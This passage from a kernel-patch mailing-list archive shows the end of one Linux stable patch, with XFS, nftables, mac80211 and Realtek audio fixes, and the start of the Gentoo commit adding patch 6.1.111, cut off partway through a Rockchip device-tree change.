++		goto error_purge;
+ 
+ 	/*
+ 	 * If one type of quotas is off, then it will lose its
+@@ -1368,7 +1389,7 @@ xfs_qm_quotacheck(
+ 	mp->m_qflags &= ~XFS_ALL_QUOTA_CHKD;
+ 	mp->m_qflags |= flags;
+ 
+- error_return:
++error_return:
+ 	xfs_buf_delwri_cancel(&buffer_list);
+ 
+ 	if (error) {
+@@ -1387,6 +1408,21 @@ xfs_qm_quotacheck(
+ 	} else
+ 		xfs_notice(mp, "Quotacheck: Done.");
+ 	return error;
++
++error_purge:
++	/*
++	 * On error, we may have inodes queued for inactivation. This may try
++	 * to attach dquots to the inode before running cleanup operations on
++	 * the inode and this can race with the xfs_qm_destroy_quotainfo() call
++	 * below that frees mp->m_quotainfo. To avoid this race, flush all the
++	 * pending inodegc operations before we purge the dquots from memory,
++	 * ensuring that background inactivation is idle whilst we turn off
++	 * quotas.
++	 */
++	xfs_inodegc_flush(mp);
++	xfs_qm_dqpurge_all(mp);
++	goto error_return;
++
+ }
+ 
+ /*
+diff --git a/fs/xfs/xfs_super.c b/fs/xfs/xfs_super.c
+index 12662b169b716e..1c143c69da6ede 100644
+--- a/fs/xfs/xfs_super.c
++++ b/fs/xfs/xfs_super.c
+@@ -1089,6 +1089,7 @@ xfs_inodegc_init_percpu(
+ #endif
+ 		init_llist_head(&gc->list);
+ 		gc->items = 0;
++		gc->error = 0;
+ 		INIT_DELAYED_WORK(&gc->work, xfs_inodegc_worker);
+ 	}
+ 	return 0;
+diff --git a/fs/xfs/xfs_trace.h b/fs/xfs/xfs_trace.h
+index 372d871bccc5eb..0cd62031e53f58 100644
+--- a/fs/xfs/xfs_trace.h
++++ b/fs/xfs/xfs_trace.h
+@@ -1877,6 +1877,7 @@ DEFINE_ALLOC_EVENT(xfs_alloc_small_notenough);
+ DEFINE_ALLOC_EVENT(xfs_alloc_small_done);
+ DEFINE_ALLOC_EVENT(xfs_alloc_small_error);
+ DEFINE_ALLOC_EVENT(xfs_alloc_vextent_badargs);
++DEFINE_ALLOC_EVENT(xfs_alloc_vextent_skip_deadlock);
+ DEFINE_ALLOC_EVENT(xfs_alloc_vextent_nofix);
+ DEFINE_ALLOC_EVENT(xfs_alloc_vextent_noagbp);
+ DEFINE_ALLOC_EVENT(xfs_alloc_vextent_loopfailed);
+@@ -3678,6 +3679,51 @@ TRACE_EVENT(xfs_iunlink_update_dinode,
+ 		  __entry->new_ptr)
+ );
+ 
++TRACE_EVENT(xfs_iunlink_reload_next,
++	TP_PROTO(struct xfs_inode *ip),
++	TP_ARGS(ip),
++	TP_STRUCT__entry(
++		__field(dev_t, dev)
++		__field(xfs_agnumber_t, agno)
++		__field(xfs_agino_t, agino)
++		__field(xfs_agino_t, prev_agino)
++		__field(xfs_agino_t, next_agino)
++	),
++	TP_fast_assign(
++		__entry->dev = ip->i_mount->m_super->s_dev;
++		__entry->agno = XFS_INO_TO_AGNO(ip->i_mount, ip->i_ino);
++		__entry->agino = XFS_INO_TO_AGINO(ip->i_mount, ip->i_ino);
++		__entry->prev_agino = ip->i_prev_unlinked;
++		__entry->next_agino = ip->i_next_unlinked;
++	),
++	TP_printk("dev %d:%d agno 0x%x agino 0x%x prev_unlinked 0x%x next_unlinked 0x%x",
++		  MAJOR(__entry->dev), MINOR(__entry->dev),
++		  __entry->agno,
++		  __entry->agino,
++		  __entry->prev_agino,
++		  __entry->next_agino)
++);
++
++TRACE_EVENT(xfs_inode_reload_unlinked_bucket,
++	TP_PROTO(struct xfs_inode *ip),
++	TP_ARGS(ip),
++	TP_STRUCT__entry(
++		__field(dev_t, dev)
++		__field(xfs_agnumber_t, agno)
++		__field(xfs_agino_t, agino)
++	),
++	TP_fast_assign(
++		__entry->dev = ip->i_mount->m_super->s_dev;
++		__entry->agno = XFS_INO_TO_AGNO(ip->i_mount, ip->i_ino);
++		__entry->agino = XFS_INO_TO_AGINO(ip->i_mount, ip->i_ino);
++	),
++	TP_printk("dev %d:%d agno 0x%x agino 0x%x bucket %u",
++		  MAJOR(__entry->dev), MINOR(__entry->dev),
++		  __entry->agno,
++		  __entry->agino,
++		  __entry->agino % XFS_AGI_UNLINKED_BUCKETS)
++);
++
+ DECLARE_EVENT_CLASS(xfs_ag_inode_class,
+ 	TP_PROTO(struct xfs_inode *ip),
+ 	TP_ARGS(ip),
+diff --git a/fs/xfs/xfs_trans.c b/fs/xfs/xfs_trans.c
+index 7bd16fbff53410..b45879868f90fc 100644
+--- a/fs/xfs/xfs_trans.c
++++ b/fs/xfs/xfs_trans.c
+@@ -290,7 +290,9 @@ xfs_trans_alloc(
+ 		 * Do not perform a synchronous scan because callers can hold
+ 		 * other locks.
+ 		 */
+-		xfs_blockgc_flush_all(mp);
++		error = xfs_blockgc_flush_all(mp);
++		if (error)
++			return error;
+ 		want_retry = false;
+ 		goto retry;
+ 	}
+@@ -970,6 +972,11 @@ __xfs_trans_commit(
+ 		error = xfs_defer_finish_noroll(&tp);
+ 		if (error)
+ 			goto out_unreserve;
++
++		/* Run precommits from final tx in defer chain. */
++		error = xfs_trans_run_precommits(tp);
++		if (error)
++			goto out_unreserve;
+ 	}
+ 
+ 	/*
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index e365302fed95db..c24b04235d9131 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -296,9 +296,22 @@ struct nft_set_elem {
+ 	void			*priv;
+ };
+ 
++/**
++ * enum nft_iter_type - nftables set iterator type
++ *
++ * @NFT_ITER_READ: read-only iteration over set elements
++ * @NFT_ITER_UPDATE: iteration under mutex to update set element state
++ */
++enum nft_iter_type {
++	NFT_ITER_UNSPEC,
++	NFT_ITER_READ,
++	NFT_ITER_UPDATE,
++};
++
+ struct nft_set;
+ struct nft_set_iter {
+ 	u8		genmask;
++	enum nft_iter_type type:8;
+ 	unsigned int	count;
+ 	unsigned int	skip;
+ 	int		err;
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 419baf8efddea2..0685ae2ea64eb0 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -5196,8 +5196,10 @@ ieee80211_beacon_get_ap(struct ieee80211_hw *hw,
+ 	if (beacon->tail)
+ 		skb_put_data(skb, beacon->tail, beacon->tail_len);
+ 
+-	if (ieee80211_beacon_protect(skb, local, sdata, link) < 0)
++	if (ieee80211_beacon_protect(skb, local, sdata, link) < 0) {
++		dev_kfree_skb(skb);
+ 		return NULL;
++	}
+ 
+ 	ieee80211_beacon_get_finish(hw, vif, link, offs, beacon, skb,
+ 				    chanctx_conf, csa_off_base);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 63b7be0a95d04c..25a9bce8cd3a4d 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -628,6 +628,7 @@ static void nft_map_deactivate(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+ 	struct nft_set_iter iter = {
+ 		.genmask	= nft_genmask_next(ctx->net),
++		.type		= NFT_ITER_UPDATE,
+ 		.fn		= nft_mapelem_deactivate,
+ 	};
+ 
+@@ -5143,6 +5144,7 @@ int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 		}
+ 
+ 		iter.genmask	= nft_genmask_next(ctx->net);
++		iter.type	= NFT_ITER_UPDATE;
+ 		iter.skip 	= 0;
+ 		iter.count	= 0;
+ 		iter.err	= 0;
+@@ -5218,6 +5220,7 @@ static void nft_map_activate(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+ 	struct nft_set_iter iter = {
+ 		.genmask	= nft_genmask_next(ctx->net),
++		.type		= NFT_ITER_UPDATE,
+ 		.fn		= nft_mapelem_activate,
+ 	};
+ 
+@@ -5574,6 +5577,7 @@ static int nf_tables_dump_set(struct sk_buff *skb, struct netlink_callback *cb)
+ 	args.cb			= cb;
+ 	args.skb		= skb;
+ 	args.iter.genmask	= nft_genmask_cur(net);
++	args.iter.type		= NFT_ITER_READ;
+ 	args.iter.skip		= cb->args[0];
+ 	args.iter.count		= 0;
+ 	args.iter.err		= 0;
+@@ -6957,6 +6961,7 @@ static int nft_set_flush(struct nft_ctx *ctx, struct nft_set *set, u8 genmask)
+ {
+ 	struct nft_set_iter iter = {
+ 		.genmask	= genmask,
++		.type		= NFT_ITER_UPDATE,
+ 		.fn		= nft_setelem_flush,
+ 	};
+ 
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index 33daee2e54c5ca..fc0ac535d0d8e1 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -211,6 +211,7 @@ static int nft_lookup_validate(const struct nft_ctx *ctx,
+ 		return 0;
+ 
+ 	iter.genmask	= nft_genmask_next(ctx->net);
++	iter.type	= NFT_ITER_UPDATE;
+ 	iter.skip	= 0;
+ 	iter.count	= 0;
+ 	iter.err	= 0;
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index d9c1c467ea6848..8336f2052f2258 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -2042,13 +2042,15 @@ static void nft_pipapo_walk(const struct nft_ctx *ctx, struct nft_set *set,
+ 			    struct nft_set_iter *iter)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+-	struct net *net = read_pnet(&set->net);
+ 	const struct nft_pipapo_match *m;
+ 	const struct nft_pipapo_field *f;
+ 	int i, r;
+ 
++	WARN_ON_ONCE(iter->type != NFT_ITER_READ &&
++		     iter->type != NFT_ITER_UPDATE);
++
+ 	rcu_read_lock();
+-	if (iter->genmask == nft_genmask_cur(net))
++	if (iter->type == NFT_ITER_READ)
+ 		m = rcu_dereference(priv->match);
+ 	else
+ 		m = priv->clone;
+diff --git a/net/netfilter/nft_socket.c b/net/netfilter/nft_socket.c
+index 0f37738e4b26a4..4148df6d6a4713 100644
+--- a/net/netfilter/nft_socket.c
++++ b/net/netfilter/nft_socket.c
+@@ -9,7 +9,8 @@
+ 
+ struct nft_socket {
+ 	enum nft_socket_keys		key:8;
+-	u8				level;
++	u8				level;		/* cgroupv2 level to extract */
++	u8				level_user;	/* cgroupv2 level provided by userspace */
+ 	u8				len;
+ 	union {
+ 		u8			dreg;
+@@ -53,6 +54,28 @@ nft_sock_get_eval_cgroupv2(u32 *dest, struct sock *sk, const struct nft_pktinfo
+ 	memcpy(dest, &cgid, sizeof(u64));
+ 	return true;
+ }
++
++/* process context only, uses current->nsproxy. */
++static noinline int nft_socket_cgroup_subtree_level(void)
++{
++	struct cgroup *cgrp = cgroup_get_from_path("/");
++	int level;
++
++	if (IS_ERR(cgrp))
++		return PTR_ERR(cgrp);
++
++	level = cgrp->level;
++
++	cgroup_put(cgrp);
++
++	if (WARN_ON_ONCE(level > 255))
++		return -ERANGE;
++
++	if (WARN_ON_ONCE(level < 0))
++		return -EINVAL;
++
++	return level;
++}
+ #endif
+ 
+ static struct sock *nft_socket_do_lookup(const struct nft_pktinfo *pkt)
+@@ -174,9 +197,10 @@ static int nft_socket_init(const struct nft_ctx *ctx,
+ 	case NFT_SOCKET_MARK:
+ 		len = sizeof(u32);
+ 		break;
+-#ifdef CONFIG_CGROUPS
++#ifdef CONFIG_SOCK_CGROUP_DATA
+ 	case NFT_SOCKET_CGROUPV2: {
+ 		unsigned int level;
++		int err;
+ 
+ 		if (!tb[NFTA_SOCKET_LEVEL])
+ 			return -EINVAL;
+@@ -185,6 +209,17 @@ static int nft_socket_init(const struct nft_ctx *ctx,
+ 		if (level > 255)
+ 			return -EOPNOTSUPP;
+ 
++		err = nft_socket_cgroup_subtree_level();
++		if (err < 0)
++			return err;
++
++		priv->level_user = level;
++
++		level += err;
++		/* Implies a giant cgroup tree */
++		if (WARN_ON_ONCE(level > 255))
++			return -EOPNOTSUPP;
++
+ 		priv->level = level;
+ 		len = sizeof(u64);
+ 		break;
+@@ -209,7 +244,7 @@ static int nft_socket_dump(struct sk_buff *skb,
+ 	if (nft_dump_register(skb, NFTA_SOCKET_DREG, priv->dreg))
+ 		return -1;
+ 	if (priv->key == NFT_SOCKET_CGROUPV2 &&
+-	    nla_put_be32(skb, NFTA_SOCKET_LEVEL, htonl(priv->level)))
++	    nla_put_be32(skb, NFTA_SOCKET_LEVEL, htonl(priv->level_user)))
+ 		return -1;
+ 	return 0;
+ }
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index 8118b8614ac680..ee980965a7cfbb 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -228,7 +228,6 @@ void cfg80211_register_wdev(struct cfg80211_registered_device *rdev,
+ static inline void wdev_lock(struct wireless_dev *wdev)
+ 	__acquires(wdev)
+ {
+-	lockdep_assert_held(&wdev->wiphy->mtx);
+ 	mutex_lock(&wdev->mtx);
+ 	__acquire(wdev->mtx);
+ }
+@@ -236,16 +235,11 @@ static inline void wdev_lock(struct wireless_dev *wdev)
+ static inline void wdev_unlock(struct wireless_dev *wdev)
+ 	__releases(wdev)
+ {
+-	lockdep_assert_held(&wdev->wiphy->mtx);
+ 	__release(wdev->mtx);
+ 	mutex_unlock(&wdev->mtx);
+ }
+ 
+-static inline void ASSERT_WDEV_LOCK(struct wireless_dev *wdev)
+-{
+-	lockdep_assert_held(&wdev->wiphy->mtx);
+-	lockdep_assert_held(&wdev->mtx);
+-}
++#define ASSERT_WDEV_LOCK(wdev) lockdep_assert_held(&(wdev)->mtx)
+ 
+ static inline bool cfg80211_has_monitors_only(struct cfg80211_registered_device *rdev)
+ {
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index d869d6ba96f3dc..277303cbe96de2 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -4928,6 +4928,30 @@ static void alc269_fixup_hp_line1_mic1_led(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc_hp_mute_disable(struct hda_codec *codec, unsigned int delay)
++{
++	if (delay <= 0)
++		delay = 75;
++	snd_hda_codec_write(codec, 0x21, 0,
++		    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_MUTE);
++	msleep(delay);
++	snd_hda_codec_write(codec, 0x21, 0,
++		    AC_VERB_SET_PIN_WIDGET_CONTROL, 0x0);
++	msleep(delay);
++}
++
++static void alc_hp_enable_unmute(struct hda_codec *codec, unsigned int delay)
++{
++	if (delay <= 0)
++		delay = 75;
++	snd_hda_codec_write(codec, 0x21, 0,
++		    AC_VERB_SET_PIN_WIDGET_CONTROL, PIN_OUT);
++	msleep(delay);
++	snd_hda_codec_write(codec, 0x21, 0,
++		    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_UNMUTE);
++	msleep(delay);
++}
++
+ static const struct coef_fw alc225_pre_hsmode[] = {
+ 	UPDATE_COEF(0x4a, 1<<8, 0),
+ 	UPDATE_COEFEX(0x57, 0x05, 1<<14, 0),
+@@ -5029,6 +5053,7 @@ static void alc_headset_mode_unplugged(struct hda_codec *codec)
+ 	case 0x10ec0236:
+ 	case 0x10ec0256:
+ 	case 0x19e58326:
++		alc_hp_mute_disable(codec, 75);
+ 		alc_process_coef_fw(codec, coef0256);
+ 		break;
+ 	case 0x10ec0234:
+@@ -5063,6 +5088,7 @@ static void alc_headset_mode_unplugged(struct hda_codec *codec)
+ 	case 0x10ec0295:
+ 	case 0x10ec0289:
+ 	case 0x10ec0299:
++		alc_hp_mute_disable(codec, 75);
+ 		alc_process_coef_fw(codec, alc225_pre_hsmode);
+ 		alc_process_coef_fw(codec, coef0225);
+ 		break;
+@@ -5288,6 +5314,7 @@ static void alc_headset_mode_default(struct hda_codec *codec)
+ 	case 0x10ec0299:
+ 		alc_process_coef_fw(codec, alc225_pre_hsmode);
+ 		alc_process_coef_fw(codec, coef0225);
++		alc_hp_enable_unmute(codec, 75);
+ 		break;
+ 	case 0x10ec0255:
+ 		alc_process_coef_fw(codec, coef0255);
+@@ -5300,6 +5327,7 @@ static void alc_headset_mode_default(struct hda_codec *codec)
+ 		alc_write_coef_idx(codec, 0x45, 0xc089);
+ 		msleep(50);
+ 		alc_process_coef_fw(codec, coef0256);
++		alc_hp_enable_unmute(codec, 75);
+ 		break;
+ 	case 0x10ec0234:
+ 	case 0x10ec0274:
+@@ -5397,6 +5425,7 @@ static void alc_headset_mode_ctia(struct hda_codec *codec)
+ 	case 0x10ec0256:
+ 	case 0x19e58326:
+ 		alc_process_coef_fw(codec, coef0256);
++		alc_hp_enable_unmute(codec, 75);
+ 		break;
+ 	case 0x10ec0234:
+ 	case 0x10ec0274:
+@@ -5445,6 +5474,7 @@ static void alc_headset_mode_ctia(struct hda_codec *codec)
+ 			alc_process_coef_fw(codec, coef0225_2);
+ 		else
+ 			alc_process_coef_fw(codec, coef0225_1);
++		alc_hp_enable_unmute(codec, 75);
+ 		break;
+ 	case 0x10ec0867:
+ 		alc_update_coefex_idx(codec, 0x57, 0x5, 1<<14, 0);
+@@ -5512,6 +5542,7 @@ static void alc_headset_mode_omtp(struct hda_codec *codec)
+ 	case 0x10ec0256:
+ 	case 0x19e58326:
+ 		alc_process_coef_fw(codec, coef0256);
++		alc_hp_enable_unmute(codec, 75);
+ 		break;
+ 	case 0x10ec0234:
+ 	case 0x10ec0274:
+@@ -5549,6 +5580,7 @@ static void alc_headset_mode_omtp(struct hda_codec *codec)
+ 	case 0x10ec0289:
+ 	case 0x10ec0299:
+ 		alc_process_coef_fw(codec, coef0225);
++		alc_hp_enable_unmute(codec, 75);
+ 		break;
+ 	}
+ 	codec_dbg(codec, "Headset jack set to Nokia-style headset mode.\n");
+@@ -5617,25 +5649,21 @@ static void alc_determine_headset_type(struct hda_codec *codec)
+ 		alc_write_coef_idx(codec, 0x06, 0x6104);
+ 		alc_write_coefex_idx(codec, 0x57, 0x3, 0x09a3);
+ 
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_MUTE);
+-		msleep(80);
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_PIN_WIDGET_CONTROL, 0x0);
+-
+ 		alc_process_coef_fw(codec, coef0255);
+ 		msleep(300);
+ 		val = alc_read_coef_idx(codec, 0x46);
+ 		is_ctia = (val & 0x0070) == 0x0070;
+-
++		if (!is_ctia) {
++			alc_write_coef_idx(codec, 0x45, 0xe089);
++			msleep(100);
++			val = alc_read_coef_idx(codec, 0x46);
++			if ((val & 0x0070) == 0x0070)
++				is_ctia = false;
++			else
++				is_ctia = true;
++		}
+ 		alc_write_coefex_idx(codec, 0x57, 0x3, 0x0da3);
+ 		alc_update_coefex_idx(codec, 0x57, 0x5, 1<<14, 0);
+-
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_PIN_WIDGET_CONTROL, PIN_OUT);
+-		msleep(80);
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_UNMUTE);
+ 		break;
+ 	case 0x10ec0234:
+ 	case 0x10ec0274:
+@@ -5712,12 +5740,6 @@ static void alc_determine_headset_type(struct hda_codec *codec)
+ 	case 0x10ec0295:
+ 	case 0x10ec0289:
+ 	case 0x10ec0299:
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_MUTE);
+-		msleep(80);
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_PIN_WIDGET_CONTROL, 0x0);
+-
+ 		alc_process_coef_fw(codec, alc225_pre_hsmode);
+ 		alc_update_coef_idx(codec, 0x67, 0xf000, 0x1000);
+ 		val = alc_read_coef_idx(codec, 0x45);
+@@ -5734,15 +5756,19 @@ static void alc_determine_headset_type(struct hda_codec *codec)
+ 			val = alc_read_coef_idx(codec, 0x46);
+ 			is_ctia = (val & 0x00f0) == 0x00f0;
+ 		}
++		if (!is_ctia) {
++			alc_update_coef_idx(codec, 0x45, 0x3f<<10, 0x38<<10);
++			alc_update_coef_idx(codec, 0x49, 3<<8, 1<<8);
++			msleep(100);
++			val = alc_read_coef_idx(codec, 0x46);
++			if ((val & 0x00f0) == 0x00f0)
++				is_ctia = false;
++			else
++				is_ctia = true;
++		}
+ 		alc_update_coef_idx(codec, 0x4a, 7<<6, 7<<6);
+ 		alc_update_coef_idx(codec, 0x4a, 3<<4, 3<<4);
+ 		alc_update_coef_idx(codec, 0x67, 0xf000, 0x3000);
+-
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_PIN_WIDGET_CONTROL, PIN_OUT);
+-		msleep(80);
+-		snd_hda_codec_write(codec, 0x21, 0,
+-			    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_UNMUTE);
+ 		break;
+ 	case 0x10ec0867:
+ 		is_ctia = true;
+diff --git a/sound/soc/amd/acp/acp-sof-mach.c b/sound/soc/amd/acp/acp-sof-mach.c
+index 972600d271586d..c594af432b3ee0 100644
+--- a/sound/soc/amd/acp/acp-sof-mach.c
++++ b/sound/soc/amd/acp/acp-sof-mach.c
+@@ -152,6 +152,8 @@ static const struct platform_device_id board_ids[] = {
+ 	},
+ 	{ }
+ };
++MODULE_DEVICE_TABLE(platform, board_ids);
++
+ static struct platform_driver acp_asoc_audio = {
+ 	.driver = {
+ 		.name = "sof_mach",
+diff --git a/sound/soc/au1x/db1200.c b/sound/soc/au1x/db1200.c
+index 400eaf9f8b1407..f185711180cb46 100644
+--- a/sound/soc/au1x/db1200.c
++++ b/sound/soc/au1x/db1200.c
+@@ -44,6 +44,7 @@ static const struct platform_device_id db1200_pids[] = {
+ 	},
+ 	{},
+ };
++MODULE_DEVICE_TABLE(platform, db1200_pids);
+ 
+ /*-------------------------  AC97 PART  ---------------------------*/
+ 
+diff --git a/sound/soc/codecs/tda7419.c b/sound/soc/codecs/tda7419.c
+index d964e5207569ce..6010df2994c7bf 100644
+--- a/sound/soc/codecs/tda7419.c
++++ b/sound/soc/codecs/tda7419.c
+@@ -623,6 +623,7 @@ static const struct of_device_id tda7419_of_match[] = {
+ 	{ .compatible = "st,tda7419" },
+ 	{ },
+ };
++MODULE_DEVICE_TABLE(of, tda7419_of_match);
+ 
+ static struct i2c_driver tda7419_driver = {
+ 	.driver = {
+diff --git a/sound/soc/intel/common/soc-acpi-intel-cht-match.c b/sound/soc/intel/common/soc-acpi-intel-cht-match.c
+index 5e2ec60e2954b2..e4c3492a0c2824 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-cht-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-cht-match.c
+@@ -84,7 +84,6 @@ static const struct dmi_system_id lenovo_yoga_tab3_x90[] = {
+ 		/* Lenovo Yoga Tab 3 Pro YT3-X90, codec missing from DSDT */
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
+ 			DMI_MATCH(DMI_PRODUCT_VERSION, "Blade3-10A-001"),
+ 		},
+ 	},
+diff --git a/sound/soc/intel/keembay/kmb_platform.c b/sound/soc/intel/keembay/kmb_platform.c
+index b4893365d01d5e..d5c48bed7a2504 100644
+--- a/sound/soc/intel/keembay/kmb_platform.c
++++ b/sound/soc/intel/keembay/kmb_platform.c
+@@ -817,6 +817,7 @@ static const struct of_device_id kmb_plat_of_match[] = {
+ 	{ .compatible = "intel,keembay-tdm", .data = &intel_kmb_tdm_dai},
+ 	{}
+ };
++MODULE_DEVICE_TABLE(of, kmb_plat_of_match);
+ 
+ static int kmb_plat_dai_probe(struct platform_device *pdev)
+ {
+diff --git a/sound/soc/sof/mediatek/mt8195/mt8195.c b/sound/soc/sof/mediatek/mt8195/mt8195.c
+index 53cadbe8a05cc0..ac96ea07e591bf 100644
+--- a/sound/soc/sof/mediatek/mt8195/mt8195.c
++++ b/sound/soc/sof/mediatek/mt8195/mt8195.c
+@@ -663,6 +663,9 @@ static struct snd_sof_of_mach sof_mt8195_machs[] = {
+ 	{
+ 		.compatible = "google,tomato",
+ 		.sof_tplg_filename = "sof-mt8195-mt6359-rt1019-rt5682.tplg"
++	}, {
++		.compatible = "google,dojo",
++		.sof_tplg_filename = "sof-mt8195-mt6359-max98390-rt5682.tplg"
+ 	}, {
+ 		.compatible = "mediatek,mt8195",
+ 		.sof_tplg_filename = "sof-mt8195.tplg"
+diff --git a/tools/hv/Makefile b/tools/hv/Makefile
+index fe770e679ae8fe..5643058e2d377b 100644
+--- a/tools/hv/Makefile
++++ b/tools/hv/Makefile
+@@ -47,7 +47,7 @@ $(OUTPUT)hv_fcopy_daemon: $(HV_FCOPY_DAEMON_IN)
+ 
+ clean:
+ 	rm -f $(ALL_PROGRAMS)
+-	find $(or $(OUTPUT),.) -name '*.o' -delete -o -name '\.*.d' -delete
++	find $(or $(OUTPUT),.) -name '*.o' -delete -o -name '\.*.d' -delete -o -name '\.*.cmd' -delete
+ 
+ install: $(ALL_PROGRAMS)
+ 	install -d -m 755 $(DESTDIR)$(sbindir); \
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 446b8daa23e071..ed7c0193ffc374 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -3048,7 +3048,9 @@ fullmesh_tests()
+ 		pm_nl_set_limits $ns1 1 3
+ 		pm_nl_set_limits $ns2 1 3
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
+-		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,fullmesh
++		if mptcp_lib_kallsyms_has "mptcp_pm_subflow_check_next$"; then
++			pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,fullmesh
++		fi
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 fullmesh_1 slow
+ 		chk_join_nr 3 3 3
+ 		chk_add_nr 1 1


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-09-18 18:04 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-09-18 18:04 UTC (permalink / raw
  To: gentoo-commits

commit:     3628dcd5601148478929fb78d0ecbb2f0bc0b637
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Sep 18 18:04:33 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Sep 18 18:04:33 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=3628dcd5

Linux patch 6.1.111

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1110_linux-6.1.111.patch | 2123 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2127 insertions(+)

diff --git a/0000_README b/0000_README
index 4375fd0f..f2f39ba5 100644
--- a/0000_README
+++ b/0000_README
@@ -487,6 +487,10 @@ Patch:  1109_linux-6.1.110.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.110
 
+Patch:  1110_linux-6.1.111.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.111
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1110_linux-6.1.111.patch b/1110_linux-6.1.111.patch
new file mode 100644
index 00000000..61cbffda
--- /dev/null
+++ b/1110_linux-6.1.111.patch
@@ -0,0 +1,2123 @@
+diff --git a/Makefile b/Makefile
+index 0e055579c7211f..d2ff3ff026255a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 110
++SUBLEVEL = 111
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts b/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts
+index d9905a08c6ce86..66443d52cd34d8 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts
+@@ -332,7 +332,7 @@ led_pin: led-pin {
+ 
+ 	pmic {
+ 		pmic_int_l: pmic-int-l {
+-			rockchip,pins = <2 RK_PA6 RK_FUNC_GPIO &pcfg_pull_up>;
++			rockchip,pins = <0 RK_PA2 RK_FUNC_GPIO &pcfg_pull_up>;
+ 		};
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi
+index 937a15005eb0e9..e089e0c26a72d1 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi
+@@ -119,6 +119,22 @@ &emmc_phy {
+ 	drive-impedance-ohm = <33>;
+ };
+ 
++&gpio3 {
++	/*
++	 * The Qseven BIOS_DISABLE signal on the RK3399-Q7 keeps the on-module
++	 * eMMC and SPI flash powered-down initially (in fact it keeps the
++	 * reset signal asserted). BIOS_DISABLE_OVERRIDE pin allows to override
++	 * that signal so that eMMC and SPI can be used regardless of the state
++	 * of the signal.
++	 */
++	bios-disable-override-hog {
++		gpios = <RK_PD5 GPIO_ACTIVE_LOW>;
++		gpio-hog;
++		line-name = "bios_disable_override";
